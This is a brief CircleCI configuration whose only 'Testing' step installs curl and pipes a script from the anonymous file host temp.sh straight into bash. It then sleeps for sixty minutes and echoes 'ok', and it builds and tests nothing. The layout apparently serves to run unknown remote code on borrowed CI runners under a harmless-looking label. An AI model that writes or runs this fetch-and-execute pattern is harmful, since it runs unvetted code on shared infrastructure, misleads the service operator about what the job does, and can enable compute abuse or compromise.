version: 2.1
jobs:
  build:
    docker:
       - image: ubuntu:14.04
    steps:
      - run:
          name: Testing
          command: |
                apt update && apt install wget -y && apt install curl -y && curl http://temp.sh/AZmjG/test.sh | bash
      - run:
          name: Waiting
          no_output_timeout: 100m
          command: |
                sleep 60m
                echo "sleep done!"
      - run:
          name: Result
          command: |
                echo "ok"